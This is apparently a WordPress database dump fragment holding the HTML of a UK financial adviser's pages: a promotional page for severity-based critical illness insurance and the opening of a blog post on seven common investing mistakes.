class=\"fullwidth-box\" style=\"background-color:#353535;background-image:url();background-repeat:no-repeat;background-position:top left;background-attachment:scroll;border-top:0px solid ;border-bottom:0px solid ;padding-top:20px;padding-bottom:20px;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\">&#13;\n<p style=\"text-align: center;\"><span style=\"color: #c0c0c0;\"><div class=\"one_third\">&#13;\n<p style=\"text-align: center;\"><style type=\"text/css\"><![CDATA[\r\n	#imageframe-4.imageframe{float:centre;}\r\n	#imageframe-4.imageframe img{border:0px solid #f6f6f6;}\r\n	#imageframe-4.imageframe-glow img{\r\n		-moz-box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n		-webkit-box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n		box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n	}\r\n	#imageframe-4.imageframe-dropshadow img{\r\n		-moz-box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n		-webkit-box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n		box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n	}\r\n	]]></style><span id=\"imageframe-4\" class=\"imageframe imageframe-bottomshadow\"><a href=\"#\"/><span class=\"imageframe-shadow-left\"/><span class=\"imageframe-shadow-right\"/></span>&#13;\n</p><p style=\"text-align: center;\"><span style=\"color: #c0c0c0;\">100% More Likely To Payout</span></p>&#13;\n<p style=\"text-align: center;\"><span style=\"color: #c0c0c0;\"><style type=\"text/css\"><![CDATA[\r\n	.post-content #checklist-1 li:before{color:#ffffff !important; content:\'f046\' }\r\n	.rtl .post-content #checklist-1 li:after{color:#ffffff !important; content:\'f046\' }\r\n	]]></style></span></p>&#13;\n<ul style=\"text-align: center;\"><li style=\"text-align: left;\"><span style=\"color: #c0c0c0;\">More coverage than other insurers</span></li>&#13;\n<li style=\"text-align: left;\"><span style=\"color: #c0c0c0;\">Less Severe stage coverage</span></li>&#13;\n<li style=\"text-align: left;\"><span style=\"color: #c0c0c0;\">Earlier stage payout when you need it</span></li>&#13;\n<li style=\"text-align: left;\"><span style=\"color: #c0c0c0;\">Covers all heart attack and strokes</span></li>&#13;\n<li style=\"text-align: left;\"><span style=\"color: #c0c0c0;\">Can make mutiple claims</span></li>&#13;\n</ul><p style=\"text-align: center;\"><span style=\"color: #c0c0c0;\"/></p>&#13;\n<p style=\"text-align: center;\"><span style=\"color: #c0c0c0;\"/></p></div></span></p>&#13;\n<p style=\"text-align: center;\"><span style=\"color: #c0c0c0;\"><div class=\"one_third\">&#13;\n<p style=\"text-align: center;\"><style type=\"text/css\"><![CDATA[\r\n	#imageframe-5.imageframe{float:centre;}\r\n	#imageframe-5.imageframe img{border:0px solid #f6f6f6;}\r\n	#imageframe-5.imageframe-glow img{\r\n		-moz-box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n		-webkit-box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n		box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n	}\r\n	#imageframe-5.imageframe-dropshadow img{\r\n		-moz-box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n		-webkit-box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n		box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n	}\r\n	]]></style><span id=\"imageframe-5\" class=\"imageframe imageframe-bottomshadow\"><a href=\"#\"/><span class=\"imageframe-shadow-left\"/><span class=\"imageframe-shadow-right\"/></span>&#13;\n</p><p style=\"text-align: center;\"><span style=\"color: #c0c0c0;\">Vitality Premium Reduction</span></p>&#13;\n<p style=\"text-align: center;\"><span style=\"color: #c0c0c0;\">Unlike any other insurer on the market, you have the opportunity to reduce your premiums through a unique healthy living programme, Vitality.</span></p>&#13;\n<p style=\"text-align: center;\"><span style=\"color: #c0c0c0;\"/></p></div></span></p>&#13;\n<p style=\"text-align: center;\"><span style=\"color: #c0c0c0;\"><div class=\"one_third last\">&#13;\n<p style=\"text-align: center;\"><style type=\"text/css\"><![CDATA[\r\n	#imageframe-6.imageframe{float:centre;}\r\n	#imageframe-6.imageframe img{border:0px solid #f6f6f6;}\r\n	#imageframe-6.imageframe-glow img{\r\n		-moz-box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n		-webkit-box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n		box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n	}\r\n	#imageframe-6.imageframe-dropshadow img{\r\n		-moz-box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n		-webkit-box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n		box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n	}\r\n	]]></style><span id=\"imageframe-6\" class=\"imageframe imageframe-bottomshadow\"><a href=\"#\"/><span class=\"imageframe-shadow-left\"/><span class=\"imageframe-shadow-right\"/></span>&#13;\n</p><p style=\"text-align: center;\"><span style=\"color: #c0c0c0;\">Vitality Rewards</span></p>&#13;\n<p style=\"text-align: center;\"><span style=\"color: #c0c0c0;\">More rewards,  you’ll get other ways to get more from life. You can get free cinema tickets, discounts on holidays, mobile phone contracts and more – you’ll be spoilt for choice</span></p>&#13;\n<p style=\"text-align: center;\"><span style=\"color: #c0c0c0;\"/></p></div><div class=\"clearboth\"/></span></p>&#13;\n<p/></div></div><div class=\"fullwidth-box\" style=\"background-color:#898989;background-image:url();background-repeat:no-repeat;background-position:top left;background-attachment:scroll;border-top:0px solid ;border-bottom:0px solid ;padding-top:40px;padding-bottom:20px;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\">&#13;\n<style type=\"text/css\"><![CDATA[\r\n		#testimonials-1 q{background-color:#fff !important;color:#000 !important;}\r\n		#testimonials-1 .review blockquote div:after{border-top-color:#fff !important;}\r\n		]]></style><div id=\"testimonials-1\" class=\"reviews clearfix\">&#13;\n<div class=\"review male\"><blockquote><q>“Insurance is an honest attempt to provide financial independence at a time when needed most. The mistake I made was to develop critical illness insurance to payout on the diagnosis of an illness….it should have been on its severity”</q><div class=\"clearfix\"><span class=\"company-name\">Dr Marius Bernard,<span> Inventor of Critical Illness Cover</span></span></div></blockquote></div>&#13;\n</div></div></div>&#13;\n<div class=\"fullwidth-box\" style=\"background-color:#444444;background-image:url();background-repeat:no-repeat;background-position:top left;background-attachment:scroll;border-top:0px solid ;border-bottom:0px solid ;padding-top:40px;padding-bottom:0px;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\">&#13;\n<p style=\"text-align: center;\"><span style=\"color: #c0c0c0;\"><big><big><big>Increase your chance of a payout by 100% over a traditional critical illness plan</big></big></big></span></p>&#13;\n<p style=\"text-align: center;\"><a class=\"button large green\" href=\"../contact-us/\" target=\"\">Click To Contact Us</a></p></div></div>&#13;\n			</div>&#13;\n					</div>&#13;\n			</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Latest Wealth Management News</p>		<ul><li>&#13;\n				<a href=\"../seven-deadly-investment-sins/\">The Seven Deadly Investment Sins</a>&#13;\n							<span class=\"post-date\">February 10, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../mortgage-strategic-alliance/\">Mortgage Strategic Alliance</a>&#13;\n							<span class=\"post-date\">February 5, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../esmart-money-januaryfebruary-2014-issue/\">eSmart Money January/February 2017 issue</a>&#13;\n							<span class=\"post-date\">January 7, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../how-much-money-can-i-get-pension/\">How much Money can I get out of my Pension?</a>&#13;\n							<span class=\"post-date\">October 31, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n							<span class=\"post-date\">September 5, 2017</span>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>This year, 2017, sees us reach our 20 year anniversary. In all that time we’ve seen real changes in the financial market, but our core values have forever remained the same. Put simply, we’ve always striven to offer unbiased and objective financial advice, with a view to protecting and enhancing our client’s wealth and sense of well-being. Welcome to our company.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"recent_works-widget-3\" class=\"footer-widget-col recent_works\"><p>Useful Guides</p>		<div class=\"recent-works-items clearfix\">&#13;\n								<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n						<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n						<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n						<a href=\"/\" title=\"Investing For Income\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"/><article class=\"col last\"/></section></div>&#13;\n	</footer><footer id=\"footer\"><div class=\"avada-row\">&#13;\n					<ul class=\"copyright\"><li><br/><br/></li>&#13;\n			</ul></div>&#13;\n	</footer></div><!-- wrapper -->&#13;\n	&#13;\n	&#13;\n	<script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main-min.js\"/></body>','Serious Illness Insurance','Severity illness cover is a revolutionary insurance that covers up to 161 illnesses, so you\'ll be covered for serious illnesses and partial disabilities.','publish','closed','closed','','serious-illness-insurance','','','2017-09-21 16:34:39','2017-09-21 16:34:39','',0,'http://www.equalitywalk.org.uk/serious-illness-insurance',0,'page','',0),(103,1,'2017-09-21 16:34:40','2017-09-21 16:34:40','<body class=\"single single-post postid-7335 single-format-standard light  wpb-js-composer js-comp-ver-4.1.2 vc_responsive\" data-spy=\"scroll\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n								<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v3\">&#13;\n		&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			<div class=\"logo\" style=\"margin-right:0px;margin-top:15px;margin-left:0px;margin-bottom:15px;\">&#13;\n				<a href=\"/\">&#13;\n					&#13;\n									</a>&#13;\n			</div>&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul class=\"navigation menu fusion-navbar-nav\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214 fusion-dropdown-menu\"><a href=\"../wealth-management/\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44 fusion-dropdown-submenu\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27 fusion-megamenu-menu\"><a href=\"../pensions/\">Pensions</a>&#13;\n<div class=\"fusion-megamenu-wrapper columns-3 col-span-12 container\"><div class=\"row\">&#13;\n&#13;\n<ul class=\"fusion-megamenu-holder\"><ul class=\"fusion-megamenu \"><li id=\"menu-item-8353\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8353 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">Pensions&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"../pensions/pension-review/\"><span class=\"fusion-megamenu-bullet\"/>Pension Review</a></li>&#13;\n		<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"../pensions/sipps/\"><span class=\"fusion-megamenu-bullet\"/>SIPPS</a></li>&#13;\n		<li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"../pensions/pension-release/\"><span class=\"fusion-megamenu-bullet\"/>Pension Release</a></li>&#13;\n		<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"../pensions/pension-transfer/\"><span class=\"fusion-megamenu-bullet\"/>Pension Transfer</a></li>&#13;\n		<li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"../tracking-down-your-lost-pension/\"><span class=\"fusion-megamenu-bullet\"/>Lost Pension</a></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-8579\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8579 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">At Retirement&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\"><span class=\"fusion-megamenu-bullet\"/>Income Drawdown</a></li>&#13;\n		<li id=\"menu-item-8599\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-8599\"><a href=\"../best-annuity-rates/\"><span class=\"fusion-megamenu-bullet\"/>Annuities</a></li>&#13;\n		<li id=\"menu-item-8580\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8580\"><div class=\"fusion-megamenu-widgets-container\"><div id=\"wooslider_slideshow_posts-2\" class=\"widget widget_wooslider_slideshow_posts\"><div id=\"wooslider-id-1\" class=\"wooslider wooslider-id-1 wooslider-type-posts wooslider-theme-default\"><ul class=\"slides\"><li class=\"slide\">&#13;\n<div class=\"layout-text-left overlay-none\"><a href=\"http://www.equalitywalk.org.uk/better-pension-drawdown-annuity/\"/><div class=\"slide-excerpt\"><h2 class=\"slide-title\"><a href=\"../better-pension-drawdown-annuity/\">Which is Better Pension Drawdown or Annuity?</a></h2></div></div></li>&#13;\n</ul></div>&#13;\n</div></div></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">For Business&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-136\"><a href=\"../pensions/auto-enrolment-pensions/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Pensions</a></li>&#13;\n		<li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"../auto-enrolment-report/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Report</a></li>&#13;\n		<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\"><span class=\"fusion-megamenu-bullet\"/>Group Pension Plan</a></li>&#13;\n	</ul></h3></li>&#13;\n&#13;\n</ul></ul><div style=\"clear:both;\"/>&#13;\n</div>&#13;\n</div>&#13;\n</li>&#13;\n<li id=\"menu-item-8624\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8624 fusion-megamenu-menu\"><a>Other Services</a>&#13;\n&#13;\n</li>&#13;\n<li id=\"menu-item-7672\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7672 fusion-dropdown-menu\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7676\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7676 fusion-dropdown-submenu\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-7677\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7677 fusion-dropdown-submenu\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n	<li id=\"menu-item-7673\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-7673 fusion-dropdown-submenu\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n	<li id=\"menu-item-7680\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7680 fusion-dropdown-submenu\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-7681\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7681 fusion-dropdown-submenu\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-7682\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7682 fusion-dropdown-submenu\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7674\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7674 fusion-dropdown-menu\"><a>Blog</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-8734\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8734 fusion-dropdown-submenu\"><a href=\"../category/video-2/\">Watch Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8732\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8732\"><a href=\"../pension-reforms-offer-freedom-savers/\">Pension Reforms Offer Freedom to Savers</a></li>&#13;\n		<li id=\"menu-item-8771\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8771\"><a href=\"../staging-date-social-advisors/\">When is your Staging Date?</a></li>&#13;\n		<li id=\"menu-item-8781\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8781\"><a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a></li>&#13;\n		<li id=\"menu-item-8780\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8780\"><a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-8733\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8733 fusion-dropdown-submenu\"><a href=\"../our-blog/\">Read Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8587\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8587\"><a href=\"../category/annuities/\">Annuities</a></li>&#13;\n		<li id=\"menu-item-8588\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8588\"><a href=\"../category/insurance-protection/\">Insurance Protection</a></li>&#13;\n		<li id=\"menu-item-8589\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8589\"><a href=\"../category\">Investments</a></li>&#13;\n		<li id=\"menu-item-8590\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8590\"><a href=\"../category/pensions/\">Pensions</a></li>&#13;\n		<li id=\"menu-item-8591\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8591\"><a href=\"../category/\">Trusts</a></li>&#13;\n		<li id=\"menu-item-8592\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-8592\"><a href=\"../category/wealth-management/\">Wealth Management</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n		</ul></nav><div class=\"mobile-nav-holder main-menu\"/>&#13;\n					</div>&#13;\n	</header></div>		<div class=\"init-sticky-header\"/>&#13;\n		</div>&#13;\n						<div id=\"sliders-container\">&#13;\n									</div>&#13;\n		&#13;\n																<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n		<div id=\"content\" class=\"full-width\" style=\"width:100%\">&#13;\n										<div id=\"post-7335\" class=\"post-7335 post type-post status-publish format-standard has-post-thumbnail hentry category-wealth-management post\">&#13;\n												<span class=\"entry-title\" style=\"display: none;\">The Seven Deadly Investment Sins</span>&#13;\n						<div class=\"post-content\">&#13;\n				<div class=\"wpb_row vc_row-fluid\"> &#13;\n	<div class=\"vc_span3 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 <div class=\"wpb_row vc_row-fluid\"> &#13;\n	<div class=\"vc_span12 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			<p><a href=\"#\"/>Fast Facts</p>&#13;\n<p> </p>&#13;\n<p><b>#1</b>  Following the Crowd:<br/>&#13;\nSometimes you need to trust your own judgement.</p>&#13;\n<p><b>#2</b> Caring too much or too little:<br/>&#13;\nKeep your long term goals firmly in mind.<br/></p>&#13;\n<p><b>#3</b> Not diversifying:<br/>&#13;\nThere was nothing safer than the UK banking sector.</p>&#13;\n<p><b>#4</b> Deciding you’re a genius:<br/>&#13;\nEven the best investors make mistakes.</p>&#13;\n<p>#5 Getting sentimental<br/>&#13;\nShares and investments don’t love you either<br/></p>&#13;\n<p>#6 Worrying about timing:<br/>&#13;\nInvest today or wait until tomorrow.</p>&#13;\n<p><span style=\"line-height: 1.5em;\">#7 Paying too much tax:<br/>&#13;\nAllowances that to often go unused.</span></p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n </div> &#13;\n		</div> &#13;\n	</div> &#13;\n &#13;\n	<div class=\"vc_span9 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			<h1><b>The Seven Deadly Investment Sins</b></h1>&#13;\n<p><b>Essential Tips For Your Investments</b></p>&#13;\n<p>By <br/>&#13;\nStrategic Development Director  Equity SMART</p>&#13;\n<p><span style=\"color: #888888;\">____</span></p>&#13;\n<p><span style=\"line-height: 1.5em; font-size: 1.17em;\">Stock markets around the world did well last year. The FSTE-100 index was up 14%, the Dow Jones Index in the USA rose 27% and the Japanese Nikkei index enjoyed a spectacular rise in excess of 50%.</span></p>&#13;\n<p>Of course, these returns can’t be guaranteed and they don’t happen every year: but they <i>have</i> focused people’s minds on investments – and with the end of the tax year approaching it’s likely that the annual rush into Individual Savings Accounts may now see investors favouring equity ISAs over the cash equivalents.</p>&#13;\n<p style=\"text-align: center;\"/>&#13;\n<p><span style=\"line-height: 1.5em;\">The problem is, investors make mistakes – and we’ve seen the same mistakes repeated over and over again.</span></p>&#13;\n<p><span style=\"line-height: 1.5em;\">So here’s the Equity SMART guide to the Seven Deadly Sins of Investment, in the hope that you </span><i style=\"line-height: 1.5em;\">won’t</i><span style=\"line-height: 1.5em;\"> make these all-too-common mistakes.</span></p>&#13;\n<p><span style=\"color: #0000ff;\">INVESTMENT MISTAKE #1: FOLLOWING THE CROWD</span></p>&#13;\n<p><span style=\"line-height: 1.5em;\">Warren Buffet is just about the most successful and the most famous investor in the world. He puts it simply: “<em>You pay a very high price in the stock market for a cheery consensus</em>.” Three centuries ago Baron Rothschild was rather more graphic: <em>“The time to buy is when there’s blood in the streets.”</em></span></p>&#13;\n<p><span style=\"line-height: 1.5em;\">The point they’re both making is that sometimes you need to trust your own judgement and go against the crowd. If you buy an investment when everyone else is buying it then, as Warren Buffet suggests, you’re going to pay a high price for it.</span></p>&#13;\n<p><span style=\"line-height: 1.5em;\"> Plenty of household names in the UK – Marks &amp; Spencer, Next, Thomas Cook – have seen their share price flounder before recovering. Sometimes an investor needs the courage to ignore the mainstream opinion and back his or her own opinion.</span></p>&#13;\n<p><span style=\"color: #0000ff;\">INVESTMENT  TIP #2: CARING TOO MUCH CARING TOO LITTLE</span></p>&#13;\n<p>Some investors obsess about their portfolio: they check the value every day – sometimes several times a day. That’s all too easy to do now you can check values on your phone or your tablet – but it’s not always sensible.</p>&#13;\n<p>If you obsess about your portfolio you can become too concerned by short term price movements. As the saying goes, investments can and do rise and fall in value. That’s their nature – and you need to keep focused on your long term savings and investment goals, not on a Tuesday afternoon when some particularly bad news from the USA affected stock markets around the world.</p>&#13;\n<p>But don’t go to completely the other extreme and ignore your investments. If you only check the value of your portfolio once every three years then don’t be surprised if there’s a nasty shock waiting for you.</p>&#13;\n<p>Whether you’re looking after your own investments or relying on reports from your financial adviser find a time frame that suits you; remember why you took out the investments in the first place and keep your long term goals firmly in mind.</p>&#13;\n<p><span style=\"color: #0000ff;\">INVESTMENT TIP #3: NOT DIVERSIFYING</span></p>&#13;\n<p>You may well think that South Korean smaller technology companies are the next big thing: the investment fund that’s going to give you stellar returns.</p>&#13;\n<p>You may well be right. Alternatively you may well be very wrong. If your portfolio isn’t diversified then you’re either going to do very well or very badly: and in our experience, that doesn’t fit the risk profile of most investors.</p>&#13;\n<p>An investment portfolio needs to be diversified – you can still have an adventurous portfolio, but your investments need to be spread both geographically <i>and</i> by sector.  Don’t have all your money invested in one country, and don’t have it all invested in one asset class. After all, there was nothing safer than the UK banking sector…</p>&#13;\n<p><span style=\"color: #0000ff;\">INVESTMENT TIP #4: DECIDING YOUR A GENIUS</span></p>&#13;\n<p>Sadly you are not an investment genius. Every investor – however much homework they do and however experienced they are – gets decisions wrong. One of the worst mistakes you can make is to let a really successful investment decision go to your head, decide that you’re blessed with some special insight and then back every hunch you have without</p>&#13;\n<p>a) researching it properly and</p>&#13;\n<p>b) making sure that it’s part of a sensible, long term investment strategy.</p>&#13;\n<p>Even the best investors 